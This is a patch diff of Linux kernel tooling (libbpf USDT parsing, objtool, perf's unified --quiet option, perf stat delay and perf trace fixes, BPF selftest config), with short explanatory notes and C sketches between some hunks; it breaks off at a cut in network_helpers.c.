+ static int parse_usdt_arg(const char *arg_str, int arg_num, struct usdt_arg_spec *arg)
+ {
+-	char *reg_name = NULL;
++	char reg_name[16];
+ 	int arg_sz, len, reg_off;
+ 	long off;
+ 
+-	if (sscanf(arg_str, " %d @ \[ %m[a-z0-9], %ld ] %n", &arg_sz, &reg_name, &off, &len) == 3) {
++	if (sscanf(arg_str, " %d @ \[ %15[a-z0-9], %ld ] %n", &arg_sz, reg_name, &off, &len) == 3) {
+ 		/* Memory dereference case, e.g., -4@[sp, 96] */
+ 		arg->arg_type = USDT_ARG_REG_DEREF;
+ 		arg->val_off = off;
+ 		reg_off = calc_pt_regs_off(reg_name);
+-		free(reg_name);
+ 		if (reg_off < 0)
+ 			return reg_off;
+ 		arg->reg_off = reg_off;
+-	} else if (sscanf(arg_str, " %d @ \[ %m[a-z0-9] ] %n", &arg_sz, &reg_name, &len) == 2) {
++	} else if (sscanf(arg_str, " %d @ \[ %15[a-z0-9] ] %n", &arg_sz, reg_name, &len) == 2) {
+ 		/* Memory dereference case, e.g., -4@[sp] */
+ 		arg->arg_type = USDT_ARG_REG_DEREF;
+ 		arg->val_off = 0;
+ 		reg_off = calc_pt_regs_off(reg_name);
+-		free(reg_name);
+ 		if (reg_off < 0)
+ 			return reg_off;
+ 		arg->reg_off = reg_off;
+@@ -1375,12 +1373,11 @@ static int parse_usdt_arg(const char *arg_str, int arg_num, struct usdt_arg_spec
+ 		arg->arg_type = USDT_ARG_CONST;
+ 		arg->val_off = off;
+ 		arg->reg_off = 0;
+-	} else if (sscanf(arg_str, " %d @ %m[a-z0-9] %n", &arg_sz, &reg_name, &len) == 2) {
++	} else if (sscanf(arg_str, " %d @ %15[a-z0-9] %n", &arg_sz, reg_name, &len) == 2) {
+ 		/* Register read case, e.g., -8@x4 */
+ 		arg->arg_type = USDT_ARG_REG;
+ 		arg->val_off = 0;
+ 		reg_off = calc_pt_regs_off(reg_name);
+-		free(reg_name);
+ 		if (reg_off < 0)
+ 			return reg_off;
+ 		arg->reg_off = reg_off;
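
The usdt.c hunks replace "%m[...]", which makes sscanf() malloc() a buffer that must be freed on every exit path, with a width-limited scanset into a fixed stack buffer; "%15[a-z0-9]" reads at most 15 characters, leaving room for the NUL in char reg_name[16]. A small standalone sketch of the same parse:

#include <stdio.h>

int main(void)
{
	const char *arg_str = "-4@[sp, 96]";
	char reg_name[16];           /* %15[...] leaves room for the NUL */
	int arg_sz, len;
	long off;

	/* A bare '[' in a scanf format matches a literal bracket; only
	 * "%[" starts a scanset. */
	if (sscanf(arg_str, " %d @ [ %15[a-z0-9], %ld ] %n",
		   &arg_sz, reg_name, &off, &len) == 3)
		printf("size=%d reg=%s off=%ld consumed=%d\n",
		       arg_sz, reg_name, off, len);
	return 0;
}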
+diff --git a/tools/objtool/check.c b/tools/objtool/check.c
+index 43ec14c29a60c..a7f1e6c8bb0a7 100644
+--- a/tools/objtool/check.c
++++ b/tools/objtool/check.c
+@@ -999,6 +999,16 @@ static const char *uaccess_safe_builtin[] = {
+ 	"__tsan_read_write4",
+ 	"__tsan_read_write8",
+ 	"__tsan_read_write16",
++	"__tsan_volatile_read1",
++	"__tsan_volatile_read2",
++	"__tsan_volatile_read4",
++	"__tsan_volatile_read8",
++	"__tsan_volatile_read16",
++	"__tsan_volatile_write1",
++	"__tsan_volatile_write2",
++	"__tsan_volatile_write4",
++	"__tsan_volatile_write8",
++	"__tsan_volatile_write16",
+ 	"__tsan_atomic8_load",
+ 	"__tsan_atomic16_load",
+ 	"__tsan_atomic32_load",
+diff --git a/tools/perf/Documentation/perf-annotate.txt b/tools/perf/Documentation/perf-annotate.txt
+index 18fcc52809fbf..980fe2c292752 100644
+--- a/tools/perf/Documentation/perf-annotate.txt
++++ b/tools/perf/Documentation/perf-annotate.txt
+@@ -41,7 +41,7 @@ OPTIONS
+ 
+ -q::
+ --quiet::
+-	Do not show any message.  (Suppress -v)
++	Do not show any warnings or messages.  (Suppress -v)
+ 
+ -n::
+ --show-nr-samples::
+diff --git a/tools/perf/Documentation/perf-diff.txt b/tools/perf/Documentation/perf-diff.txt
+index be65bd55ab2aa..f3067a4af2940 100644
+--- a/tools/perf/Documentation/perf-diff.txt
++++ b/tools/perf/Documentation/perf-diff.txt
+@@ -75,7 +75,7 @@ OPTIONS
+ 
+ -q::
+ --quiet::
+-	Do not show any message.  (Suppress -v)
++	Do not show any warnings or messages.  (Suppress -v)
+ 
+ -f::
+ --force::
+diff --git a/tools/perf/Documentation/perf-lock.txt b/tools/perf/Documentation/perf-lock.txt
+index 3b1e16563b795..4958a1ffa1cca 100644
+--- a/tools/perf/Documentation/perf-lock.txt
++++ b/tools/perf/Documentation/perf-lock.txt
+@@ -42,7 +42,7 @@ COMMON OPTIONS
+ 
+ -q::
+ --quiet::
+-	Do not show any message. (Suppress -v)
++	Do not show any warnings or messages. (Suppress -v)
+ 
+ -D::
+ --dump-raw-trace::
+diff --git a/tools/perf/Documentation/perf-probe.txt b/tools/perf/Documentation/perf-probe.txt
+index 080981d38d7ba..7f8e8ba3a7872 100644
+--- a/tools/perf/Documentation/perf-probe.txt
++++ b/tools/perf/Documentation/perf-probe.txt
+@@ -57,7 +57,7 @@ OPTIONS
+ 
+ -q::
+ --quiet::
+-	Be quiet (do not show any messages including errors).
++	Do not show any warnings or messages.
+ 	Can not use with -v.
+ 
+ -a::
+diff --git a/tools/perf/Documentation/perf-record.txt b/tools/perf/Documentation/perf-record.txt
+index e41ae950fdc3b..9ea6d44aca58c 100644
+--- a/tools/perf/Documentation/perf-record.txt
++++ b/tools/perf/Documentation/perf-record.txt
+@@ -282,7 +282,7 @@ OPTIONS
+ 
+ -q::
+ --quiet::
+-	Don't print any message, useful for scripting.
++	Don't print any warnings or messages, useful for scripting.
+ 
+ -v::
+ --verbose::
+diff --git a/tools/perf/Documentation/perf-report.txt b/tools/perf/Documentation/perf-report.txt
+index 4533db2ee56bb..4fa509b159489 100644
+--- a/tools/perf/Documentation/perf-report.txt
++++ b/tools/perf/Documentation/perf-report.txt
+@@ -27,7 +27,7 @@ OPTIONS
+ 
+ -q::
+ --quiet::
+-	Do not show any message.  (Suppress -v)
++	Do not show any warnings or messages.  (Suppress -v)
+ 
+ -n::
+ --show-nr-samples::
+diff --git a/tools/perf/Documentation/perf-stat.txt b/tools/perf/Documentation/perf-stat.txt
+index d7ff1867feda6..18abdc1dce055 100644
+--- a/tools/perf/Documentation/perf-stat.txt
++++ b/tools/perf/Documentation/perf-stat.txt
+@@ -354,8 +354,8 @@ forbids the event merging logic from sharing events between groups and
+ may be used to increase accuracy in this case.
+ 
+ --quiet::
+-Don't print output. This is useful with perf stat record below to only
+-write data to the perf.data file.
++Don't print output, warnings or messages. This is useful with perf stat
++record below to only write data to the perf.data file.
+ 
+ STAT RECORD
+ -----------
+diff --git a/tools/perf/bench/numa.c b/tools/perf/bench/numa.c
+index e78dedf9e682c..9717c6c17433c 100644
+--- a/tools/perf/bench/numa.c
++++ b/tools/perf/bench/numa.c
+@@ -16,6 +16,7 @@
+ #include <sched.h>
+ #include <stdio.h>
+ #include <assert.h>
++#include <debug.h>
+ #include <malloc.h>
+ #include <signal.h>
+ #include <stdlib.h>
+@@ -116,7 +117,6 @@ struct params {
+ 	long			bytes_thread;
+ 
+ 	int			nr_tasks;
+-	bool			show_quiet;
+ 
+ 	bool			show_convergence;
+ 	bool			measure_convergence;
+@@ -197,7 +197,8 @@ static const struct option options[] = {
+ 	OPT_BOOLEAN('c', "show_convergence", &p0.show_convergence, "show convergence details, "
+ 		    "convergence is reached when each process (all its threads) is running on a single NUMA node."),
+ 	OPT_BOOLEAN('m', "measure_convergence",	&p0.measure_convergence, "measure convergence latency"),
+-	OPT_BOOLEAN('q', "quiet"	, &p0.show_quiet,	"quiet mode"),
++	OPT_BOOLEAN('q', "quiet"	, &quiet,
++		    "quiet mode (do not show any warnings or messages)"),
+ 	OPT_BOOLEAN('S', "serialize-startup", &p0.serialize_startup,"serialize thread startup"),
+ 
+ 	/* Special option string parsing callbacks: */
+@@ -1474,7 +1475,7 @@ static int init(void)
+ 	/* char array in count_process_nodes(): */
+ 	BUG_ON(g->p.nr_nodes < 0);
+ 
+-	if (g->p.show_quiet && !g->p.show_details)
++	if (quiet && !g->p.show_details)
+ 		g->p.show_details = -1;
+ 
+ 	/* Some memory should be specified: */
+@@ -1553,7 +1554,7 @@ static void print_res(const char *name, double val,
+ 	if (!name)
+ 		name = "main,";
+ 
+-	if (!g->p.show_quiet)
++	if (!quiet)
+ 		printf(" %-30s %15.3f, %-15s %s\n", name, val, txt_unit, txt_short);
+ 	else
+ 		printf(" %14.3f %s\n", val, txt_long);
+diff --git a/tools/perf/builtin-annotate.c b/tools/perf/builtin-annotate.c
+index f839e69492e80..517d928c00e3f 100644
+--- a/tools/perf/builtin-annotate.c
++++ b/tools/perf/builtin-annotate.c
+@@ -525,7 +525,7 @@ int cmd_annotate(int argc, const char **argv)
+ 	OPT_BOOLEAN('f', "force", &data.force, "don't complain, do it"),
+ 	OPT_INCR('v', "verbose", &verbose,
+ 		    "be more verbose (show symbol address, etc)"),
+-	OPT_BOOLEAN('q', "quiet", &quiet, "do now show any message"),
++	OPT_BOOLEAN('q', "quiet", &quiet, "do not show any warnings or messages"),
+ 	OPT_BOOLEAN('D', "dump-raw-trace", &dump_trace,
+ 		    "dump raw trace in ASCII"),
+ #ifdef HAVE_GTK2_SUPPORT
+diff --git a/tools/perf/builtin-diff.c b/tools/perf/builtin-diff.c
+index d925096dd7f02..ed07cc6cca56c 100644
+--- a/tools/perf/builtin-diff.c
++++ b/tools/perf/builtin-diff.c
+@@ -1260,7 +1260,7 @@ static const char * const diff_usage[] = {
+ static const struct option options[] = {
+ 	OPT_INCR('v', "verbose", &verbose,
+ 		    "be more verbose (show symbol address, etc)"),
+-	OPT_BOOLEAN('q', "quiet", &quiet, "Do not show any message"),
++	OPT_BOOLEAN('q', "quiet", &quiet, "Do not show any warnings or messages"),
+ 	OPT_BOOLEAN('b', "baseline-only", &show_baseline_only,
+ 		    "Show only items with match in baseline"),
+ 	OPT_CALLBACK('c', "compute", &compute,
+diff --git a/tools/perf/builtin-lock.c b/tools/perf/builtin-lock.c
+index 9722d4ab2e557..66520712a1675 100644
+--- a/tools/perf/builtin-lock.c
++++ b/tools/perf/builtin-lock.c
+@@ -1869,7 +1869,7 @@ int cmd_lock(int argc, const char **argv)
+ 		   "file", "vmlinux pathname"),
+ 	OPT_STRING(0, "kallsyms", &symbol_conf.kallsyms_name,
+ 		   "file", "kallsyms pathname"),
+-	OPT_BOOLEAN('q', "quiet", &quiet, "Do not show any message"),
++	OPT_BOOLEAN('q', "quiet", &quiet, "Do not show any warnings or messages"),
+ 	OPT_END()
+ 	};
+ 
+diff --git a/tools/perf/builtin-probe.c b/tools/perf/builtin-probe.c
+index f62298f5db3b4..ed73d0b89ca2d 100644
+--- a/tools/perf/builtin-probe.c
++++ b/tools/perf/builtin-probe.c
+@@ -40,7 +40,6 @@ static struct {
+ 	int command;	/* Command short_name */
+ 	bool list_events;
+ 	bool uprobes;
+-	bool quiet;
+ 	bool target_used;
+ 	int nevents;
+ 	struct perf_probe_event events[MAX_PROBES];
+@@ -514,8 +513,8 @@ __cmd_probe(int argc, const char **argv)
+ 	struct option options[] = {
+ 	OPT_INCR('v', "verbose", &verbose,
+ 		    "be more verbose (show parsed arguments, etc)"),
+-	OPT_BOOLEAN('q', "quiet", &params.quiet,
+-		    "be quiet (do not show any messages)"),
++	OPT_BOOLEAN('q', "quiet", &quiet,
++		    "be quiet (do not show any warnings or messages)"),
+ 	OPT_CALLBACK_DEFAULT('l', "list", NULL, "[GROUP:]EVENT",
+ 			     "list up probe events",
+ 			     opt_set_filter_with_command, DEFAULT_LIST_FILTER),
+@@ -613,6 +612,15 @@ __cmd_probe(int argc, const char **argv)
+ 
+ 	argc = parse_options(argc, argv, options, probe_usage,
+ 			     PARSE_OPT_STOP_AT_NON_OPTION);
++
++	if (quiet) {
++		if (verbose != 0) {
++			pr_err("  Error: -v and -q are exclusive.\n");
++			return -EINVAL;
++		}
++		verbose = -1;
++	}
++
+ 	if (argc > 0) {
+ 		if (strcmp(argv[0], "-") == 0) {
+ 			usage_with_options_msg(probe_usage, options,
+@@ -634,14 +642,6 @@ __cmd_probe(int argc, const char **argv)
+ 	if (ret)
+ 		return ret;
+ 
+-	if (params.quiet) {
+-		if (verbose != 0) {
+-			pr_err("  Error: -v and -q are exclusive.\n");
+-			return -EINVAL;
+-		}
+-		verbose = -1;
+-	}
+-
+ 	if (probe_conf.max_probes == 0)
+ 		probe_conf.max_probes = MAX_PROBES;
+ 
+diff --git a/tools/perf/builtin-record.c b/tools/perf/builtin-record.c
+index e128b855dddec..59f3d98a0196d 100644
+--- a/tools/perf/builtin-record.c
++++ b/tools/perf/builtin-record.c
+@@ -3388,7 +3388,7 @@ static struct option __record_options[] = {
+ 		     &record_parse_callchain_opt),
+ 	OPT_INCR('v', "verbose", &verbose,
+ 		    "be more verbose (show counter open errors, etc)"),
+-	OPT_BOOLEAN('q', "quiet", &quiet, "don't print any message"),
++	OPT_BOOLEAN('q', "quiet", &quiet, "don't print any warnings or messages"),
+ 	OPT_BOOLEAN('s', "stat", &record.opts.inherit_stat,
+ 		    "per thread counts"),
+ 	OPT_BOOLEAN('d', "data", &record.opts.sample_address, "Record the sample addresses"),
+diff --git a/tools/perf/builtin-report.c b/tools/perf/builtin-report.c
+index 8361890176c23..b6d77d3da64f6 100644
+--- a/tools/perf/builtin-report.c
++++ b/tools/perf/builtin-report.c
+@@ -1222,7 +1222,7 @@ int cmd_report(int argc, const char **argv)
+ 		    "input file name"),
+ 	OPT_INCR('v', "verbose", &verbose,
+ 		    "be more verbose (show symbol address, etc)"),
+-	OPT_BOOLEAN('q', "quiet", &quiet, "Do not show any message"),
++	OPT_BOOLEAN('q', "quiet", &quiet, "Do not show any warnings or messages"),
+ 	OPT_BOOLEAN('D', "dump-raw-trace", &dump_trace,
+ 		    "dump raw trace in ASCII"),
+ 	OPT_BOOLEAN(0, "stats", &report.stats_mode, "Display event stats"),
+diff --git a/tools/perf/builtin-stat.c b/tools/perf/builtin-stat.c
+index 265b051579726..978fdc60b4e84 100644
+--- a/tools/perf/builtin-stat.c
++++ b/tools/perf/builtin-stat.c
+@@ -528,26 +528,14 @@ static int enable_counters(void)
+ 			return err;
+ 	}
+ 
+-	if (stat_config.initial_delay < 0) {
+-		pr_info(EVLIST_DISABLED_MSG);
+-		return 0;
+-	}
+-
+-	if (stat_config.initial_delay > 0) {
+-		pr_info(EVLIST_DISABLED_MSG);
+-		usleep(stat_config.initial_delay * USEC_PER_MSEC);
+-	}
+-
+ 	/*
+ 	 * We need to enable counters only if:
+ 	 * - we don't have tracee (attaching to task or cpu)
+ 	 * - we have initial delay configured
+ 	 */
+-	if (!target__none(&target) || stat_config.initial_delay) {
++	if (!target__none(&target)) {
+ 		if (!all_counters_use_bpf)
+ 			evlist__enable(evsel_list);
+-		if (stat_config.initial_delay > 0)
+-			pr_info(EVLIST_ENABLED_MSG);
+ 	}
+ 	return 0;
+ }
+@@ -918,14 +906,27 @@ try_again_reset:
+ 			return err;
+ 	}
+ 
+-	err = enable_counters();
+-	if (err)
+-		return -1;
++	if (stat_config.initial_delay) {
++		pr_info(EVLIST_DISABLED_MSG);
++	} else {
++		err = enable_counters();
++		if (err)
++			return -1;
++	}
+ 
+ 	/* Exec the command, if any */
+ 	if (forks)
+ 		evlist__start_workload(evsel_list);
+ 
++	if (stat_config.initial_delay > 0) {
++		usleep(stat_config.initial_delay * USEC_PER_MSEC);
++		err = enable_counters();
++		if (err)
++			return -1;
++
++		pr_info(EVLIST_ENABLED_MSG);
++	}
++
+ 	t0 = rdclock();
+ 	clock_gettime(CLOCK_MONOTONIC, &ref_time);
+ 
+@@ -1023,7 +1024,7 @@ static void print_counters(struct timespec *ts, int argc, const char **argv)
+ 	/* Do not print anything if we record to the pipe. */
+ 	if (STAT_RECORD && perf_stat.data.is_pipe)
+ 		return;
+-	if (stat_config.quiet)
++	if (quiet)
+ 		return;
+ 
+ 	evlist__print_counters(evsel_list, &stat_config, &target, ts, argc, argv);
+@@ -1273,8 +1274,8 @@ static struct option stat_options[] = {
+ 		       "print summary for interval mode"),
+ 	OPT_BOOLEAN(0, "no-csv-summary", &stat_config.no_csv_summary,
+ 		       "don't print 'summary' for CSV summary output"),
+-	OPT_BOOLEAN(0, "quiet", &stat_config.quiet,
+-			"don't print output (useful with record)"),
++	OPT_BOOLEAN(0, "quiet", &quiet,
++			"don't print any output, messages or warnings (useful with record)"),
+ 	OPT_CALLBACK(0, "cputype", &evsel_list, "hybrid cpu type",
+ 		     "Only enable events on applying cpu with this type "
+ 		     "for hybrid platform (e.g. core or atom)",
+@@ -2277,7 +2278,7 @@ int cmd_stat(int argc, const char **argv)
+ 		goto out;
+ 	}
+ 
+-	if (!output && !stat_config.quiet) {
++	if (!output && !quiet) {
+ 		struct timespec tm;
+ 		mode = append_file ? "a" : "w";
+ 
+diff --git a/tools/perf/builtin-trace.c b/tools/perf/builtin-trace.c
+index d3c757769b965..3dcf6aed1ef71 100644
+--- a/tools/perf/builtin-trace.c
++++ b/tools/perf/builtin-trace.c
+@@ -88,6 +88,8 @@
+ # define F_LINUX_SPECIFIC_BASE	1024
+ #endif
+ 
++#define RAW_SYSCALL_ARGS_NUM	6
++
+ /*
+  * strtoul: Go from a string to a value, i.e. for msr: MSR_FS_BASE to 0xc0000100
+  */
+@@ -108,7 +110,7 @@ struct syscall_fmt {
+ 		const char *sys_enter,
+ 			   *sys_exit;
+ 	}	   bpf_prog_name;
+-	struct syscall_arg_fmt arg[6];
++	struct syscall_arg_fmt arg[RAW_SYSCALL_ARGS_NUM];
+ 	u8	   nr_args;
+ 	bool	   errpid;
+ 	bool	   timeout;
+@@ -1226,7 +1228,7 @@ struct syscall {
+  */
+ struct bpf_map_syscall_entry {
+ 	bool	enabled;
+-	u16	string_args_len[6];
++	u16	string_args_len[RAW_SYSCALL_ARGS_NUM];
+ };
+ 
+ /*
+@@ -1658,7 +1660,7 @@ static int syscall__alloc_arg_fmts(struct syscall *sc, int nr_args)
+ {
+ 	int idx;
+ 
+-	if (nr_args == 6 && sc->fmt && sc->fmt->nr_args != 0)
++	if (nr_args == RAW_SYSCALL_ARGS_NUM && sc->fmt && sc->fmt->nr_args != 0)
+ 		nr_args = sc->fmt->nr_args;
+ 
+ 	sc->arg_fmt = calloc(nr_args, sizeof(*sc->arg_fmt));
+@@ -1791,11 +1793,11 @@ static int trace__read_syscall_info(struct trace *trace, int id)
+ #endif
+ 	sc = trace->syscalls.table + id;
+ 	if (sc->nonexistent)
+-		return 0;
++		return -EEXIST;
+ 
+ 	if (name == NULL) {
+ 		sc->nonexistent = true;
+-		return 0;
++		return -EEXIST;
+ 	}
+ 
+ 	sc->name = name;
+@@ -1809,11 +1811,18 @@ static int trace__read_syscall_info(struct trace *trace, int id)
+ 		sc->tp_format = trace_event__tp_format("syscalls", tp_name);
+ 	}
+ 
+-	if (syscall__alloc_arg_fmts(sc, IS_ERR(sc->tp_format) ? 6 : sc->tp_format->format.nr_fields))
+-		return -ENOMEM;
+-
+-	if (IS_ERR(sc->tp_format))
++	/*
++	 * Failed to read the tracepoint format via the sysfs node, so the
++	 * tracepoint doesn't exist.  Set the 'nonexistent' flag to true.
++	 */
++	if (IS_ERR(sc->tp_format)) {
++		sc->nonexistent = true;
+ 		return PTR_ERR(sc->tp_format);
++	}
++
++	if (syscall__alloc_arg_fmts(sc, IS_ERR(sc->tp_format) ?
++					RAW_SYSCALL_ARGS_NUM : sc->tp_format->format.nr_fields))
++		return -ENOMEM;
+ 
+ 	sc->args = sc->tp_format->format.fields;
+ 	/*
+@@ -2131,11 +2140,8 @@ static struct syscall *trace__syscall_info(struct trace *trace,
+ 	    (err = trace__read_syscall_info(trace, id)) != 0)
+ 		goto out_cant_read;
+ 
+-	if (trace->syscalls.table[id].name == NULL) {
+-		if (trace->syscalls.table[id].nonexistent)
+-			return NULL;
++	if (trace->syscalls.table && trace->syscalls.table[id].nonexistent)
+ 		goto out_cant_read;
+-	}
+ 
+ 	return &trace->syscalls.table[id];
+ 
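
The builtin-trace.c hunks make trace__read_syscall_info() cache the "this id does not exist" result and report -EEXIST instead of 0, so callers stop mistaking a missing tracepoint for success. A compact sketch of that negative-caching shape (stand-in names):

#include <errno.h>
#include <stdbool.h>
#include <stdio.h>

struct entry {
	bool nonexistent;        /* cached "no such syscall" result */
	const char *name;
};

static const char *lookup_name(int id)
{
	return id == 0 ? "read" : NULL;  /* stand-in syscall table */
}

static int read_info(struct entry *e, int id)
{
	if (e->nonexistent)
		return -EEXIST;          /* fail fast on the cached miss */

	e->name = lookup_name(id);
	if (!e->name) {
		e->nonexistent = true;   /* remember the miss */
		return -EEXIST;          /* was 0, which read as success */
	}
	return 0;
}

int main(void)
{
	struct entry e = { false, NULL };

	printf("%d\n", read_info(&e, 7)); /* first miss: -17 */
	printf("%d\n", read_info(&e, 7)); /* cached miss: -17 */
	return 0;
}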
+diff --git a/tools/perf/tests/shell/stat_all_pmu.sh b/tools/perf/tests/shell/stat_all_pmu.sh
+index 9c9ef33e0b3c6..c779554191731 100755
+--- a/tools/perf/tests/shell/stat_all_pmu.sh
++++ b/tools/perf/tests/shell/stat_all_pmu.sh
+@@ -4,17 +4,8 @@
+ 
+ set -e
+ 
+-for p in $(perf list --raw-dump pmu); do
+-  # In powerpc, skip the events for hv_24x7 and hv_gpci.
+-  # These events needs input values to be filled in for
+-  # core, chip, partition id based on system.
+-  # Example: hv_24x7/CPM_ADJUNCT_INST,domain=?,core=?/
+-  # hv_gpci/event,partition_id=?/
+-  # Hence skip these events for ppc.
+-  if echo "$p" |grep -Eq 'hv_24x7|hv_gpci' ; then
+-    echo "Skipping: Event '$p' in powerpc"
+-    continue
+-  fi
++# Test all PMU events, excluding parametrized ones (name contains '?')
++for p in $(perf list --raw-dump pmu | sed 's/[[:graph:]]\+?[[:graph:]]\+[[:space:]]//g'); do
+   echo "Testing $p"
+   result=$(perf stat -e "$p" true 2>&1)
+   if ! echo "$result" | grep -q "$p" && ! echo "$result" | grep -q "<not supported>" ; then
+diff --git a/tools/perf/ui/util.c b/tools/perf/ui/util.c
+index 689b27c34246c..1d38ddf01b604 100644
+--- a/tools/perf/ui/util.c
++++ b/tools/perf/ui/util.c
+@@ -15,6 +15,9 @@ static int perf_stdio__error(const char *format, va_list args)
+ 
+ static int perf_stdio__warning(const char *format, va_list args)
+ {
++	if (quiet)
++		return 0;
++
+ 	fprintf(stderr, "Warning:\n");
+ 	vfprintf(stderr, format, args);
+ 	return 0;
+@@ -45,6 +48,8 @@ int ui__warning(const char *format, ...)
+ {
+ 	int ret;
+ 	va_list args;
++	if (quiet)
++		return 0;
+ 
+ 	va_start(args, format);
+ 	ret = perf_eops->warning(format, args);
+diff --git a/tools/perf/util/bpf_off_cpu.c b/tools/perf/util/bpf_off_cpu.c
+index c257813e674ef..01f70b8e705a8 100644
+--- a/tools/perf/util/bpf_off_cpu.c
++++ b/tools/perf/util/bpf_off_cpu.c
+@@ -102,7 +102,7 @@ static void check_sched_switch_args(void)
+ 	const struct btf_type *t1, *t2, *t3;
+ 	u32 type_id;
+ 
+-	type_id = btf__find_by_name_kind(btf, "bpf_trace_sched_switch",
++	type_id = btf__find_by_name_kind(btf, "btf_trace_sched_switch",
+ 					 BTF_KIND_TYPEDEF);
+ 	if ((s32)type_id < 0)
+ 		return;
+diff --git a/tools/perf/util/branch.h b/tools/perf/util/branch.h
+index f838b23db1804..dca75cad96f68 100644
+--- a/tools/perf/util/branch.h
++++ b/tools/perf/util/branch.h
+@@ -24,9 +24,10 @@ struct branch_flags {
+ 			u64 abort:1;
+ 			u64 cycles:16;
+ 			u64 type:4;
++			u64 spec:2;
+ 			u64 new_type:4;
+ 			u64 priv:3;
+-			u64 reserved:33;
++			u64 reserved:31;
+ 		};
+ 	};
+ };
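
The branch.h hunk adds a 2-bit 'spec' field and shrinks 'reserved' from 33 to 31 bits so the widths still cover the backing u64 exactly. A standalone illustration of that invariant (the leading 3-bit field stands in for the mispred/predicted/in_tx bits that sit above this hunk):

#include <assert.h>
#include <stdint.h>

union branch_flags_sketch {
	uint64_t value;
	struct {
		uint64_t head:3;      /* stand-in for bits not shown in the hunk */
		uint64_t abort:1;
		uint64_t cycles:16;
		uint64_t type:4;
		uint64_t spec:2;      /* the new field */
		uint64_t new_type:4;
		uint64_t priv:3;
		uint64_t reserved:31; /* was 33; shrunk by the 2 bits spec took */
	};
};

/* Adding a field without shrinking reserved would silently grow the
 * struct past the u64 it is meant to overlay. */
static_assert(3 + 1 + 16 + 4 + 2 + 4 + 3 + 31 == 64, "widths must sum to 64");
static_assert(sizeof(union branch_flags_sketch) == sizeof(uint64_t),
	      "must stay overlaid on a single u64");

int main(void) { return 0; }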
+diff --git a/tools/perf/util/debug.c b/tools/perf/util/debug.c
+index 65e6c22f38e4f..190e818a07176 100644
+--- a/tools/perf/util/debug.c
++++ b/tools/perf/util/debug.c
+@@ -241,6 +241,10 @@ int perf_quiet_option(void)
+ 		opt++;
+ 	}
+ 
++	/* For debug variables that are used as bool types, set to 0. */
++	redirect_to_stderr = 0;
++	debug_peo_args = 0;
++
+ 	return 0;
+ }
+ 
+diff --git a/tools/perf/util/stat-display.c b/tools/perf/util/stat-display.c
+index ba66bb7fc1ca7..bc866d18973e4 100644
+--- a/tools/perf/util/stat-display.c
++++ b/tools/perf/util/stat-display.c
+@@ -704,7 +704,7 @@ static void uniquify_event_name(struct evsel *counter)
+ 			counter->name = new_name;
+ 		}
+ 	} else {
+-		if (perf_pmu__has_hybrid()) {
++		if (evsel__is_hybrid(counter)) {
+ 			ret = asprintf(&new_name, "%s/%s/",
+ 				       counter->pmu_name, counter->name);
+ 		} else {
+@@ -744,26 +744,14 @@ static void collect_all_aliases(struct perf_stat_config *config, struct evsel *c
+ 	}
+ }
+ 
+-static bool is_uncore(struct evsel *evsel)
+-{
+-	struct perf_pmu *pmu = evsel__find_pmu(evsel);
+-
+-	return pmu && pmu->is_uncore;
+-}
+-
+-static bool hybrid_uniquify(struct evsel *evsel)
+-{
+-	return perf_pmu__has_hybrid() && !is_uncore(evsel);
+-}
+-
+ static bool hybrid_merge(struct evsel *counter, struct perf_stat_config *config,
+ 			 bool check)
+ {
+-	if (hybrid_uniquify(counter)) {
++	if (evsel__is_hybrid(counter)) {
+ 		if (check)
+-			return config && config->hybrid_merge;
++			return config->hybrid_merge;
+ 		else
+-			return config && !config->hybrid_merge;
++			return !config->hybrid_merge;
+ 	}
+ 
+ 	return false;
+@@ -1142,11 +1130,16 @@ static void print_metric_headers(struct perf_stat_config *config,
+ 				 struct evlist *evlist,
+ 				 const char *prefix, bool no_indent)
+ {
+-	struct perf_stat_output_ctx out;
+ 	struct evsel *counter;
+ 	struct outstate os = {
+ 		.fh = config->output
+ 	};
++	struct perf_stat_output_ctx out = {
++		.ctx = &os,
++		.print_metric = print_metric_header,
++		.new_line = new_line_metric,
++		.force_header = true,
++	};
+ 	bool first = true;
+ 
+ 		if (config->json_output && !config->interval)
+@@ -1170,13 +1163,11 @@ static void print_metric_headers(struct perf_stat_config *config,
+ 	/* Print metrics headers only */
+ 	evlist__for_each_entry(evlist, counter) {
+ 		os.evsel = counter;
+-		out.ctx = &os;
+-		out.print_metric = print_metric_header;
++
+ 		if (!first && config->json_output)
+ 			fprintf(config->output, ", ");
+ 		first = false;
+-		out.new_line = new_line_metric;
+-		out.force_header = true;
++
+ 		perf_stat__print_shadow_stats(config, counter, 0,
+ 					      0,
+ 					      &out,
+diff --git a/tools/perf/util/stat.h b/tools/perf/util/stat.h
+index b0899c6e002f5..35c940d7f29cd 100644
+--- a/tools/perf/util/stat.h
++++ b/tools/perf/util/stat.h
+@@ -139,7 +139,6 @@ struct perf_stat_config {
+ 	bool			 metric_no_group;
+ 	bool			 metric_no_merge;
+ 	bool			 stop_read_counter;
+-	bool			 quiet;
+ 	bool			 iostat_run;
+ 	char			 *user_requested_cpu_list;
+ 	bool			 system_wide;
+diff --git a/tools/perf/util/symbol-elf.c b/tools/perf/util/symbol-elf.c
+index 647b7dff8ef36..80345695b1360 100644
+--- a/tools/perf/util/symbol-elf.c
++++ b/tools/perf/util/symbol-elf.c
+@@ -1303,7 +1303,7 @@ dso__load_sym_internal(struct dso *dso, struct map *map, struct symsrc *syms_ss,
+ 			   (!used_opd && syms_ss->adjust_symbols)) {
+ 			GElf_Phdr phdr;
+ 
+-			if (elf_read_program_header(syms_ss->elf,
++			if (elf_read_program_header(runtime_ss->elf,
+ 						    (u64)sym.st_value, &phdr)) {
+ 				pr_debug4("%s: failed to find program header for "
+ 					   "symbol: %s st_value: %#" PRIx64 "\n",
+diff --git a/tools/testing/selftests/bpf/config b/tools/testing/selftests/bpf/config
+index 9213565c03117..59cec4244b3a7 100644
+--- a/tools/testing/selftests/bpf/config
++++ b/tools/testing/selftests/bpf/config
+@@ -13,6 +13,7 @@ CONFIG_CRYPTO_USER_API_HASH=y
+ CONFIG_DYNAMIC_FTRACE=y
+ CONFIG_FPROBE=y
+ CONFIG_FTRACE_SYSCALLS=y
++CONFIG_FUNCTION_ERROR_INJECTION=y
+ CONFIG_FUNCTION_TRACER=y
+ CONFIG_GENEVE=y
+ CONFIG_IKCONFIG=y
+diff --git a/tools/testing/selftests/bpf/network_helpers.c b/tools/testing/selftests/bpf/network_helpers.c
+index bec15558fd938..1f37adff7632c 100644
+--- a/tools/testing/selftests/bpf/network_helpers.c
++++ b/tools/testing/selftests/bpf/network_helpers.c
+@@ -426,6 +426,10 @@ static int setns_by_fd(int nsfd)
